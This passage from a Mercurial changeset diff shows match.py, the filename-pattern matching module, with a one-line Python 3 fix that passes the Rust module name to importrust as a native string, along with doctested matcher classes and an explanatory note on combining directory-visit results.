py3: do not convert rust module/attribute names to bytes...
Yuya Nishihara
r43034:e94c8f58 default
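
The hunk below changes a single line (line 28): the module name passed to policy.importrust() gains an r prefix. Mercurial's Python 3 source loader rewrites unprefixed string literals into bytes literals and leaves r-prefixed literals as native str, and module/attribute names handed to the import machinery must stay native str. A minimal sketch of the failure this avoids, using a hypothetical stub module rather than Mercurial's actual loader:

    import types
    mod = types.ModuleType('rustext')   # stand-in for the Rust extension
    mod.filepatterns = object()         # stub submodule attribute
    getattr(mod, 'filepatterns')        # fine: attribute name is a str
    # getattr(mod, b'filepatterns')     # TypeError on Python 3: attribute
    #                                   # name must be string, not 'bytes'
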
@@ -1,1526 +1,1526 @@
# match.py - filename matching
#
# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import, print_function

import copy
import itertools
import os
import re

from .i18n import _
from . import (
    encoding,
    error,
    pathutil,
    policy,
    pycompat,
    util,
)
from .utils import (
    stringutil,
)

-rustmod = policy.importrust('filepatterns')
+rustmod = policy.importrust(r'filepatterns')

allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
                   'rootglob',
                   'listfile', 'listfile0', 'set', 'include', 'subinclude',
                   'rootfilesin')
cwdrelativepatternkinds = ('relpath', 'glob')

propertycache = util.propertycache

def _rematcher(regex):
    '''compile the regexp with the best available regexp engine and return a
    matcher function'''
    m = util.re.compile(regex)
    try:
        # slightly faster, provided by facebook's re2 bindings
        return m.test_match
    except AttributeError:
        return m.match

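# Illustrative note (not part of upstream): _rematcher returns a bound match
# method, so e.g. _rematcher(b'.*\.c$')(b'main.c') is truthy while
# _rematcher(b'.*\.c$')(b'main.py') is falsy (a match object or None, or a
# plain bool if the faster re2 bindings are available).
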
def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
    '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
    matchers = []
    other = []

    for kind, pat, source in kindpats:
        if kind == 'set':
            if ctx is None:
                raise error.ProgrammingError("fileset expression with no "
                                             "context")
            matchers.append(ctx.matchfileset(pat, badfn=badfn))

            if listsubrepos:
                for subpath in ctx.substate:
                    sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
                    pm = prefixdirmatcher(subpath, sm, badfn=badfn)
                    matchers.append(pm)

            continue
        other.append((kind, pat, source))
    return matchers, other

def _expandsubinclude(kindpats, root):
    '''Returns the list of subinclude matcher args and the kindpats without the
    subincludes in it.'''
    relmatchers = []
    other = []

    for kind, pat, source in kindpats:
        if kind == 'subinclude':
            sourceroot = pathutil.dirname(util.normpath(source))
            pat = util.pconvert(pat)
            path = pathutil.join(sourceroot, pat)

            newroot = pathutil.dirname(path)
            matcherargs = (newroot, '', [], ['include:%s' % path])

            prefix = pathutil.canonpath(root, root, newroot)
            if prefix:
                prefix += '/'
            relmatchers.append((prefix, matcherargs))
        else:
            other.append((kind, pat, source))

    return relmatchers, other

def _kindpatsalwaysmatch(kindpats):
    """Checks whether the kindpats match everything, as e.g.
    'relpath:.' does.
    """
    for kind, pat, source in kindpats:
        if pat != '' or kind not in ['relpath', 'glob']:
            return False
    return True

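# Illustrative examples (not part of upstream): after normalization,
# 'relpath:.' becomes ('relpath', '', ''), so
# _kindpatsalwaysmatch([('relpath', '', '')]) is True, while
# _kindpatsalwaysmatch([('glob', '*.c', '')]) is False.
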
def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
                          listsubrepos=False, badfn=None):
    matchers = []
    fms, kindpats = _expandsets(kindpats, ctx=ctx,
                                listsubrepos=listsubrepos, badfn=badfn)
    if kindpats:
        m = matchercls(root, kindpats, badfn=badfn)
        matchers.append(m)
    if fms:
        matchers.extend(fms)
    if not matchers:
        return nevermatcher(badfn=badfn)
    if len(matchers) == 1:
        return matchers[0]
    return unionmatcher(matchers)

def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
          auditor=None, ctx=None, listsubrepos=False, warn=None,
          badfn=None, icasefs=False):
    r"""build an object to match a set of file patterns

    arguments:
    root - the canonical root of the tree you're matching against
    cwd - the current working directory, if relevant
    patterns - patterns to find
    include - patterns to include (unless they are excluded)
    exclude - patterns to exclude (even if they are included)
    default - if a pattern in patterns has no explicit type, assume this one
    auditor - optional path auditor
    ctx - optional changecontext
    listsubrepos - if True, recurse into subrepositories
    warn - optional function used for printing warnings
    badfn - optional bad() callback for this matcher instead of the default
    icasefs - make a matcher for wdir on case insensitive filesystems, which
        normalizes the given patterns to the case in the filesystem

    a pattern is one of:
    'glob:<glob>' - a glob relative to cwd
    're:<regexp>' - a regular expression
    'path:<path>' - a path relative to repository root, which is matched
                    recursively
    'rootfilesin:<path>' - a path relative to repository root, which is
                    matched non-recursively (will not match subdirectories)
    'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
    'relpath:<path>' - a path relative to cwd
    'relre:<regexp>' - a regexp that needn't match the start of a name
    'set:<fileset>' - a fileset expression
    'include:<path>' - a file of patterns to read and include
    'subinclude:<path>' - a file of patterns to match against files under
                          the same directory
    '<something>' - a pattern of the specified default type

    Usually a patternmatcher is returned:
    >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
    <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>

    Combining 'patterns' with 'include' (resp. 'exclude') gives an
    intersectionmatcher (resp. a differencematcher):
    >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
    <class 'mercurial.match.intersectionmatcher'>
    >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
    <class 'mercurial.match.differencematcher'>

    Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
    >>> match(b'foo', b'.', [])
    <alwaysmatcher>

    The 'default' argument determines which kind of pattern is assumed if a
    pattern has no prefix:
    >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
    <patternmatcher patterns='.*\\.c$'>
    >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
    <patternmatcher patterns='main\\.py(?:/|$)'>
    >>> match(b'foo', b'.', [b'main.py'], default=b're')
    <patternmatcher patterns='main.py'>

    The primary use of matchers is to check whether a value (usually a file
    name) matches against one of the patterns given at initialization. There
    are two ways of doing this check.

    >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])

    1. Calling the matcher with a file name returns True if any pattern
    matches that file name:
    >>> m(b'a')
    True
    >>> m(b'main.c')
    True
    >>> m(b'test.py')
    False

    2. Using the exact() method only returns True if the file name matches one
    of the exact patterns (i.e. not re: or glob: patterns):
    >>> m.exact(b'a')
    True
    >>> m.exact(b'main.c')
    False
    """
    normalize = _donormalize
    if icasefs:
        dirstate = ctx.repo().dirstate
        dsnormalize = dirstate.normalize

        def normalize(patterns, default, root, cwd, auditor, warn):
            kp = _donormalize(patterns, default, root, cwd, auditor, warn)
            kindpats = []
            for kind, pats, source in kp:
                if kind not in ('re', 'relre'):  # regex can't be normalized
                    p = pats
                    pats = dsnormalize(pats)

                    # Preserve the original to handle a case only rename.
                    if p != pats and p in dirstate:
                        kindpats.append((kind, p, source))

                kindpats.append((kind, pats, source))
            return kindpats

    if patterns:
        kindpats = normalize(patterns, default, root, cwd, auditor, warn)
        if _kindpatsalwaysmatch(kindpats):
            m = alwaysmatcher(badfn)
        else:
            m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
                                      listsubrepos=listsubrepos, badfn=badfn)
    else:
        # It's a little strange that no patterns means to match everything.
        # Consider changing this to match nothing (probably using nevermatcher).
        m = alwaysmatcher(badfn)

    if include:
        kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
        im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
                                   listsubrepos=listsubrepos, badfn=None)
        m = intersectmatchers(m, im)
    if exclude:
        kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
        em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
                                   listsubrepos=listsubrepos, badfn=None)
        m = differencematcher(m, em)
    return m

def exact(files, badfn=None):
    return exactmatcher(files, badfn=badfn)

def always(badfn=None):
    return alwaysmatcher(badfn)

def never(badfn=None):
    return nevermatcher(badfn)

def badmatch(match, badfn):
    """Make a copy of the given matcher, replacing its bad method with the given
    one.
    """
    m = copy.copy(match)
    m.bad = badfn
    return m

def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
    '''Convert 'kind:pat' from the patterns list to tuples with kind and
    normalized and rooted patterns and with listfiles expanded.'''
    kindpats = []
    for kind, pat in [_patsplit(p, default) for p in patterns]:
        if kind in cwdrelativepatternkinds:
            pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
        elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
            pat = util.normpath(pat)
        elif kind in ('listfile', 'listfile0'):
            try:
                files = util.readfile(pat)
                if kind == 'listfile0':
                    files = files.split('\0')
                else:
                    files = files.splitlines()
                files = [f for f in files if f]
            except EnvironmentError:
                raise error.Abort(_("unable to read file list (%s)") % pat)
            for k, p, source in _donormalize(files, default, root, cwd,
                                             auditor, warn):
                kindpats.append((k, p, pat))
            continue
        elif kind == 'include':
            try:
                fullpath = os.path.join(root, util.localpath(pat))
                includepats = readpatternfile(fullpath, warn)
                for k, p, source in _donormalize(includepats, default,
                                                 root, cwd, auditor, warn):
                    kindpats.append((k, p, source or pat))
            except error.Abort as inst:
                raise error.Abort('%s: %s' % (pat, inst[0]))
            except IOError as inst:
                if warn:
                    warn(_("skipping unreadable pattern file '%s': %s\n") %
                         (pat, stringutil.forcebytestr(inst.strerror)))
                continue
        # else: re or relre - which cannot be normalized
        kindpats.append((kind, pat, ''))
    return kindpats

class basematcher(object):

    def __init__(self, badfn=None):
        if badfn is not None:
            self.bad = badfn

    def __call__(self, fn):
        return self.matchfn(fn)
    # Callbacks related to how the matcher is used by dirstate.walk.
    # Subscribers to these events must monkeypatch the matcher object.
    def bad(self, f, msg):
        '''Callback from dirstate.walk for each explicit file that can't be
        found/accessed, with an error message.'''

    # If an explicitdir is set, it will be called when an explicitly listed
    # directory is visited.
    explicitdir = None

    # If a traversedir is set, it will be called when a directory discovered
    # by recursive traversal is visited.
    traversedir = None

    @propertycache
    def _files(self):
        return []

    def files(self):
        '''Explicitly listed files or patterns or roots:
        if no patterns or .always(): empty list,
        if exact: list exact files,
        if not .anypats(): list all files and dirs,
        else: optimal roots'''
        return self._files

    @propertycache
    def _fileset(self):
        return set(self._files)

    def exact(self, f):
        '''Returns True if f is in .files().'''
        return f in self._fileset

    def matchfn(self, f):
        return False

    def visitdir(self, dir):
        '''Decides whether a directory should be visited based on whether it
        has potential matches in it or one of its subdirectories. This is
        based on the match's primary, included, and excluded patterns.

        Returns the string 'all' if the given directory and all subdirectories
        should be visited. Otherwise returns True or False indicating whether
        the given directory should be visited.
        '''
        return True

    def visitchildrenset(self, dir):
        '''Decides whether a directory should be visited based on whether it
        has potential matches in it or one of its subdirectories, and
        potentially lists which subdirectories of that directory should be
        visited. This is based on the match's primary, included, and excluded
        patterns.

        This function is very similar to 'visitdir', and the following mapping
        can be applied:

         visitdir | visitchildrenset
        ----------+-------------------
         False    | set()
         'all'    | 'all'
         True     | 'this' OR non-empty set of subdirs -or files- to visit

        Example:
        Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
        the following values (assuming the implementation of visitchildrenset
        is capable of recognizing this; some implementations are not).

        '' -> {'foo', 'qux'}
        'baz' -> set()
        'foo' -> {'bar'}
        # Ideally this would be 'all', but since the prefix nature of matchers
        # is applied to the entire matcher, we have to downgrade this to
        # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
        # in.
        'foo/bar' -> 'this'
        'qux' -> 'this'

        Important:
        Most matchers do not know if they're representing files or
        directories. They see ['path:dir/f'] and don't know whether 'f' is a
        file or a directory, so visitchildrenset('dir') for most matchers will
        return {'f'}, but if the matcher knows it's a file (like exactmatcher
        does), it may return 'this'. Do not rely on the return being a set
        indicating that there are no files in this dir to investigate (or
        equivalently that if there are files to investigate in 'dir' that it
        will always return 'this').
        '''
        return 'this'

    def always(self):
        '''Matcher will match everything and .files() will be empty --
        optimization might be possible.'''
        return False

    def isexact(self):
        '''Matcher will match exactly the list of files in .files() --
        optimization might be possible.'''
        return False

    def prefix(self):
        '''Matcher will match the paths in .files() recursively --
        optimization might be possible.'''
        return False

    def anypats(self):
        '''None of .always(), .isexact(), and .prefix() is true --
        optimizations will be difficult.'''
        return not self.always() and not self.isexact() and not self.prefix()

class alwaysmatcher(basematcher):
    '''Matches everything.'''

    def __init__(self, badfn=None):
        super(alwaysmatcher, self).__init__(badfn)

    def always(self):
        return True

    def matchfn(self, f):
        return True

    def visitdir(self, dir):
        return 'all'

    def visitchildrenset(self, dir):
        return 'all'

    def __repr__(self):
        return r'<alwaysmatcher>'

class nevermatcher(basematcher):
    '''Matches nothing.'''

    def __init__(self, badfn=None):
        super(nevermatcher, self).__init__(badfn)

    # It's a little weird to say that the nevermatcher is an exact matcher
    # or a prefix matcher, but it seems to make sense to let callers take
    # fast paths based on either. There will be no exact matches, nor any
    # prefixes (files() returns []), so fast paths iterating over them should
    # be efficient (and correct).
    def isexact(self):
        return True

    def prefix(self):
        return True

    def visitdir(self, dir):
        return False

    def visitchildrenset(self, dir):
        return set()

    def __repr__(self):
        return r'<nevermatcher>'

class predicatematcher(basematcher):
    """A matcher adapter for a simple boolean function"""

    def __init__(self, predfn, predrepr=None, badfn=None):
        super(predicatematcher, self).__init__(badfn)
        self.matchfn = predfn
        self._predrepr = predrepr

    @encoding.strmethod
    def __repr__(self):
        s = (stringutil.buildrepr(self._predrepr)
             or pycompat.byterepr(self.matchfn))
        return '<predicatenmatcher pred=%s>' % s

def normalizerootdir(dir, funcname):
    if dir == '.':
        util.nouideprecwarn("match.%s() no longer accepts "
                            "'.', use '' instead." % funcname, '5.1')
        return ''
    return dir


class patternmatcher(basematcher):
    """Matches a set of (kind, pat, source) against a 'root' directory.

    >>> kindpats = [
    ...     (b're', br'.*\.c$', b''),
    ...     (b'path', b'foo/a', b''),
    ...     (b'relpath', b'b', b''),
    ...     (b'glob', b'*.h', b''),
    ... ]
    >>> m = patternmatcher(b'foo', kindpats)
    >>> m(b'main.c') # matches re:.*\.c$
    True
    >>> m(b'b.txt')
    False
    >>> m(b'foo/a') # matches path:foo/a
    True
    >>> m(b'a') # does not match path:b, since 'root' is 'foo'
    False
    >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
    True
    >>> m(b'lib.h') # matches glob:*.h
    True

    >>> m.files()
    ['', 'foo/a', 'b', '']
    >>> m.exact(b'foo/a')
    True
    >>> m.exact(b'b')
    True
    >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
    False
    """

    def __init__(self, root, kindpats, badfn=None):
        super(patternmatcher, self).__init__(badfn)

        self._files = _explicitfiles(kindpats)
        self._prefix = _prefix(kindpats)
        self._pats, self.matchfn = _buildmatch(kindpats, '$', root)

    @propertycache
    def _dirs(self):
        return set(util.dirs(self._fileset))

    def visitdir(self, dir):
        dir = normalizerootdir(dir, 'visitdir')
        if self._prefix and dir in self._fileset:
            return 'all'
        return (dir in self._fileset or
                dir in self._dirs or
                any(parentdir in self._fileset
                    for parentdir in util.finddirs(dir)))

    def visitchildrenset(self, dir):
        ret = self.visitdir(dir)
        if ret is True:
            return 'this'
        elif not ret:
            return set()
        assert ret == 'all'
        return 'all'

    def prefix(self):
        return self._prefix

    @encoding.strmethod
    def __repr__(self):
        return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))

# This is basically a reimplementation of util.dirs that stores the children
# instead of just a count of them, plus a small optional optimization to avoid
# some directories we don't need.
class _dirchildren(object):
    def __init__(self, paths, onlyinclude=None):
        self._dirs = {}
        self._onlyinclude = onlyinclude or []
        addpath = self.addpath
        for f in paths:
            addpath(f)

    def addpath(self, path):
        if path == '':
            return
        dirs = self._dirs
        findsplitdirs = _dirchildren._findsplitdirs
        for d, b in findsplitdirs(path):
            if d not in self._onlyinclude:
                continue
            dirs.setdefault(d, set()).add(b)

    @staticmethod
    def _findsplitdirs(path):
        # yields (dirname, basename) tuples, walking back to the root. This is
        # very similar to util.finddirs, except:
        # - produces a (dirname, basename) tuple, not just 'dirname'
        # Unlike manifest._splittopdir, this does not suffix `dirname` with a
        # slash.
        oldpos = len(path)
        pos = path.rfind('/')
        while pos != -1:
            yield path[:pos], path[pos + 1:oldpos]
            oldpos = pos
            pos = path.rfind('/', 0, pos)
        yield '', path[:oldpos]

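    # Illustrative example (not part of upstream): for 'a/b/c',
    # _findsplitdirs yields ('a/b', 'c'), then ('a', 'b'), then ('', 'a').
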
    def get(self, path):
        return self._dirs.get(path, set())

class includematcher(basematcher):

    def __init__(self, root, kindpats, badfn=None):
        super(includematcher, self).__init__(badfn)

        self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
        self._prefix = _prefix(kindpats)
        roots, dirs, parents = _rootsdirsandparents(kindpats)
        # roots are directories which are recursively included.
        self._roots = set(roots)
        # dirs are directories which are non-recursively included.
        self._dirs = set(dirs)
        # parents are directories which are non-recursively included because
        # they are needed to get to items in _dirs or _roots.
        self._parents = parents

    def visitdir(self, dir):
        dir = normalizerootdir(dir, 'visitdir')
        if self._prefix and dir in self._roots:
            return 'all'
        return (dir in self._roots or
                dir in self._dirs or
                dir in self._parents or
                any(parentdir in self._roots
                    for parentdir in util.finddirs(dir)))

    @propertycache
    def _allparentschildren(self):
        # It may seem odd that we add dirs, roots, and parents, and then
        # restrict to only parents. This is to catch the case of:
        # dirs = ['foo/bar']
        # parents = ['foo']
        # if we asked for the children of 'foo', but had only added
        # self._parents, we wouldn't be able to respond ['bar'].
        return _dirchildren(
            itertools.chain(self._dirs, self._roots, self._parents),
            onlyinclude=self._parents)

    def visitchildrenset(self, dir):
        if self._prefix and dir in self._roots:
            return 'all'
        # Note: this does *not* include the 'dir in self._parents' case from
        # visitdir, that's handled below.
        if ('' in self._roots or
            dir in self._roots or
            dir in self._dirs or
            any(parentdir in self._roots
                for parentdir in util.finddirs(dir))):
            return 'this'

        if dir in self._parents:
            return self._allparentschildren.get(dir) or set()
        return set()

    @encoding.strmethod
    def __repr__(self):
        return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))

class exactmatcher(basematcher):
    r'''Matches the input files exactly. They are interpreted as paths, not
    patterns (so no kind-prefixes).

    >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
    >>> m(b'a.txt')
    True
    >>> m(b'b.txt')
    False

    Input files that would be matched are exactly those returned by .files()
    >>> m.files()
    ['a.txt', 're:.*\\.c$']

    So pattern 're:.*\.c$' is not considered as a regex, but as a file name
    >>> m(b'main.c')
    False
    >>> m(br're:.*\.c$')
    True
    '''

    def __init__(self, files, badfn=None):
        super(exactmatcher, self).__init__(badfn)

        if isinstance(files, list):
            self._files = files
        else:
            self._files = list(files)

    matchfn = basematcher.exact

    @propertycache
    def _dirs(self):
        return set(util.dirs(self._fileset))

    def visitdir(self, dir):
        dir = normalizerootdir(dir, 'visitdir')
        return dir in self._dirs

    def visitchildrenset(self, dir):
        dir = normalizerootdir(dir, 'visitchildrenset')

        if not self._fileset or dir not in self._dirs:
            return set()

        candidates = self._fileset | self._dirs - {''}
        if dir != '':
            d = dir + '/'
            candidates = set(c[len(d):] for c in candidates if
                             c.startswith(d))
        # self._dirs includes all of the directories, recursively, so if
        # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
        # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
        # '/' in it, indicating it's for a subdir-of-a-subdir; the
        # immediate subdir will be in there without a slash.
        ret = {c for c in candidates if '/' not in c}
        # We really do not expect ret to be empty, since that would imply that
        # there's something in _dirs that didn't have a file in _fileset.
        assert ret
        return ret

    def isexact(self):
        return True

    @encoding.strmethod
    def __repr__(self):
        return ('<exactmatcher files=%r>' % self._files)

class differencematcher(basematcher):
    '''Composes two matchers by matching if the first matches and the second
    does not.

    The second matcher's non-matching-attributes (bad, explicitdir,
    traversedir) are ignored.
    '''
    def __init__(self, m1, m2):
        super(differencematcher, self).__init__()
        self._m1 = m1
        self._m2 = m2
        self.bad = m1.bad
        self.explicitdir = m1.explicitdir
        self.traversedir = m1.traversedir

    def matchfn(self, f):
        return self._m1(f) and not self._m2(f)

    @propertycache
    def _files(self):
        if self.isexact():
            return [f for f in self._m1.files() if self(f)]
        # If m1 is not an exact matcher, we can't easily figure out the set of
        # files, because its files() are not always files. For example, if
        # m1 is "path:dir" and m2 is "rootfilesin:.", we don't
        # want to remove "dir" from the set even though it would match m2,
        # because the "dir" in m1 may not be a file.
        return self._m1.files()

    def visitdir(self, dir):
        if self._m2.visitdir(dir) == 'all':
            return False
        elif not self._m2.visitdir(dir):
            # m2 does not match dir, we can return 'all' here if possible
            return self._m1.visitdir(dir)
        return bool(self._m1.visitdir(dir))

    def visitchildrenset(self, dir):
        m2_set = self._m2.visitchildrenset(dir)
        if m2_set == 'all':
            return set()
        m1_set = self._m1.visitchildrenset(dir)
        # Possible values for m1: 'all', 'this', set(...), set()
        # Possible values for m2: 'this', set(...), set()
        # If m2 has nothing under here that we care about, return m1, even if
        # it's 'all'. This is a change in behavior from visitdir, which would
        # return True, not 'all', for some reason.
        if not m2_set:
            return m1_set
        if m1_set in ['all', 'this']:
            # Never return 'all' here if m2_set is any kind of non-empty (either
            # 'this' or set(foo)), since m2 might return set() for a
            # subdirectory.
            return 'this'
        # Possible values for m1: set(...), set()
        # Possible values for m2: 'this', set(...)
        # We ignore m2's set results. They're possibly incorrect:
        # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
        # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
        # return set(), which is *not* correct, we still need to visit 'dir'!
        return m1_set

    def isexact(self):
        return self._m1.isexact()

    @encoding.strmethod
    def __repr__(self):
        return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))

def intersectmatchers(m1, m2):
    '''Composes two matchers by matching if both of them match.

    The second matcher's non-matching-attributes (bad, explicitdir,
    traversedir) are ignored.
    '''
    if m1 is None or m2 is None:
        return m1 or m2
    if m1.always():
        m = copy.copy(m2)
        # TODO: Consider encapsulating these things in a class so there's only
        # one thing to copy from m1.
        m.bad = m1.bad
        m.explicitdir = m1.explicitdir
        m.traversedir = m1.traversedir
        return m
    if m2.always():
        m = copy.copy(m1)
        return m
    return intersectionmatcher(m1, m2)

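# Illustrative note (not part of upstream): intersectmatchers() collapses the
# trivial cases, e.g. intersectmatchers(alwaysmatcher(), m) returns a plain
# copy of m carrying the first matcher's bad/explicitdir/traversedir
# callbacks, so no intersectionmatcher wrapper is built.
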
815 class intersectionmatcher(basematcher):
815 class intersectionmatcher(basematcher):
816 def __init__(self, m1, m2):
816 def __init__(self, m1, m2):
817 super(intersectionmatcher, self).__init__()
817 super(intersectionmatcher, self).__init__()
818 self._m1 = m1
818 self._m1 = m1
819 self._m2 = m2
819 self._m2 = m2
820 self.bad = m1.bad
820 self.bad = m1.bad
821 self.explicitdir = m1.explicitdir
821 self.explicitdir = m1.explicitdir
822 self.traversedir = m1.traversedir
822 self.traversedir = m1.traversedir
823
823
824 @propertycache
824 @propertycache
825 def _files(self):
825 def _files(self):
826 if self.isexact():
826 if self.isexact():
827 m1, m2 = self._m1, self._m2
827 m1, m2 = self._m1, self._m2
828 if not m1.isexact():
828 if not m1.isexact():
829 m1, m2 = m2, m1
829 m1, m2 = m2, m1
830 return [f for f in m1.files() if m2(f)]
830 return [f for f in m1.files() if m2(f)]
831 # It neither m1 nor m2 is an exact matcher, we can't easily intersect
831 # It neither m1 nor m2 is an exact matcher, we can't easily intersect
832 # the set of files, because their files() are not always files. For
832 # the set of files, because their files() are not always files. For
833 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
833 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
834 # "path:dir2", we don't want to remove "dir2" from the set.
834 # "path:dir2", we don't want to remove "dir2" from the set.
835 return self._m1.files() + self._m2.files()
835 return self._m1.files() + self._m2.files()
836
836
837 def matchfn(self, f):
837 def matchfn(self, f):
838 return self._m1(f) and self._m2(f)
838 return self._m1(f) and self._m2(f)
839
839
840 def visitdir(self, dir):
840 def visitdir(self, dir):
841 visit1 = self._m1.visitdir(dir)
841 visit1 = self._m1.visitdir(dir)
842 if visit1 == 'all':
842 if visit1 == 'all':
843 return self._m2.visitdir(dir)
843 return self._m2.visitdir(dir)
844 # bool() because visit1=True + visit2='all' should not be 'all'
844 # bool() because visit1=True + visit2='all' should not be 'all'
845 return bool(visit1 and self._m2.visitdir(dir))
845 return bool(visit1 and self._m2.visitdir(dir))
846
846
847 def visitchildrenset(self, dir):
847 def visitchildrenset(self, dir):
848 m1_set = self._m1.visitchildrenset(dir)
848 m1_set = self._m1.visitchildrenset(dir)
849 if not m1_set:
849 if not m1_set:
850 return set()
850 return set()
851 m2_set = self._m2.visitchildrenset(dir)
851 m2_set = self._m2.visitchildrenset(dir)
852 if not m2_set:
852 if not m2_set:
853 return set()
853 return set()
854
854
855 if m1_set == 'all':
855 if m1_set == 'all':
856 return m2_set
856 return m2_set
857 elif m2_set == 'all':
857 elif m2_set == 'all':
858 return m1_set
858 return m1_set
859
859
860 if m1_set == 'this' or m2_set == 'this':
860 if m1_set == 'this' or m2_set == 'this':
861 return 'this'
861 return 'this'
862
862
863 assert isinstance(m1_set, set) and isinstance(m2_set, set)
863 assert isinstance(m1_set, set) and isinstance(m2_set, set)
864 return m1_set.intersection(m2_set)
864 return m1_set.intersection(m2_set)
865
865
866 def always(self):
866 def always(self):
867 return self._m1.always() and self._m2.always()
867 return self._m1.always() and self._m2.always()
868
868
869 def isexact(self):
869 def isexact(self):
870 return self._m1.isexact() or self._m2.isexact()
870 return self._m1.isexact() or self._m2.isexact()
871
871
872 @encoding.strmethod
872 @encoding.strmethod
873 def __repr__(self):
873 def __repr__(self):
874 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
874 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
875
875
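# Editor's note: a minimal, self-contained sketch (not part of this
# changeset) of the tri-state combination rule implemented by
# intersectionmatcher.visitchildrenset() above. visitchildrenset() answers
# one of: 'all' (descend everywhere), 'this' (inspect this directory, no
# statement about children), a set of child names to visit, or an empty
# set (skip). The helper name intersect_visit is hypothetical.

def intersect_visit(v1, v2):
    if not v1 or not v2:
        return set()        # either side skipping skips the intersection
    if v1 == 'all':
        return v2           # 'all' is the identity element
    if v2 == 'all':
        return v1
    if v1 == 'this' or v2 == 'this':
        return 'this'       # 'this' taints the result
    return v1 & v2          # two concrete child-name sets intersect

assert intersect_visit('all', {'a', 'b'}) == {'a', 'b'}
assert intersect_visit({'a', 'b'}, {'b', 'c'}) == {'b'}
assert intersect_visit('this', {'a'}) == 'this'
assert intersect_visit(set(), 'all') == set()
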
876 class subdirmatcher(basematcher):
876 class subdirmatcher(basematcher):
877 """Adapt a matcher to work on a subdirectory only.
877 """Adapt a matcher to work on a subdirectory only.
878
878
879 The paths are remapped to remove/insert the path as needed:
879 The paths are remapped to remove/insert the path as needed:
880
880
881 >>> from . import pycompat
881 >>> from . import pycompat
882 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
882 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
883 >>> m2 = subdirmatcher(b'sub', m1)
883 >>> m2 = subdirmatcher(b'sub', m1)
884 >>> m2(b'a.txt')
884 >>> m2(b'a.txt')
885 False
885 False
886 >>> m2(b'b.txt')
886 >>> m2(b'b.txt')
887 True
887 True
888 >>> m2.matchfn(b'a.txt')
888 >>> m2.matchfn(b'a.txt')
889 False
889 False
890 >>> m2.matchfn(b'b.txt')
890 >>> m2.matchfn(b'b.txt')
891 True
891 True
892 >>> m2.files()
892 >>> m2.files()
893 ['b.txt']
893 ['b.txt']
894 >>> m2.exact(b'b.txt')
894 >>> m2.exact(b'b.txt')
895 True
895 True
896 >>> def bad(f, msg):
896 >>> def bad(f, msg):
897 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
897 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
898 >>> m1.bad = bad
898 >>> m1.bad = bad
899 >>> m2.bad(b'x.txt', b'No such file')
899 >>> m2.bad(b'x.txt', b'No such file')
900 sub/x.txt: No such file
900 sub/x.txt: No such file
901 """
901 """
902
902
903 def __init__(self, path, matcher):
903 def __init__(self, path, matcher):
904 super(subdirmatcher, self).__init__()
904 super(subdirmatcher, self).__init__()
905 self._path = path
905 self._path = path
906 self._matcher = matcher
906 self._matcher = matcher
907 self._always = matcher.always()
907 self._always = matcher.always()
908
908
909 self._files = [f[len(path) + 1:] for f in matcher._files
909 self._files = [f[len(path) + 1:] for f in matcher._files
910 if f.startswith(path + "/")]
910 if f.startswith(path + "/")]
911
911
912 # If the parent repo had a path to this subrepo and the matcher is
912 # If the parent repo had a path to this subrepo and the matcher is
913 # a prefix matcher, this submatcher always matches.
913 # a prefix matcher, this submatcher always matches.
914 if matcher.prefix():
914 if matcher.prefix():
915 self._always = any(f == path for f in matcher._files)
915 self._always = any(f == path for f in matcher._files)
916
916
917 def bad(self, f, msg):
917 def bad(self, f, msg):
918 self._matcher.bad(self._path + "/" + f, msg)
918 self._matcher.bad(self._path + "/" + f, msg)
919
919
920 def matchfn(self, f):
920 def matchfn(self, f):
921 # Some information is lost in the superclass's constructor, so we
921 # Some information is lost in the superclass's constructor, so we
922 # can not accurately create the matching function for the subdirectory
922 # can not accurately create the matching function for the subdirectory
923 # from the inputs. Instead, we override matchfn() and visitdir() to
923 # from the inputs. Instead, we override matchfn() and visitdir() to
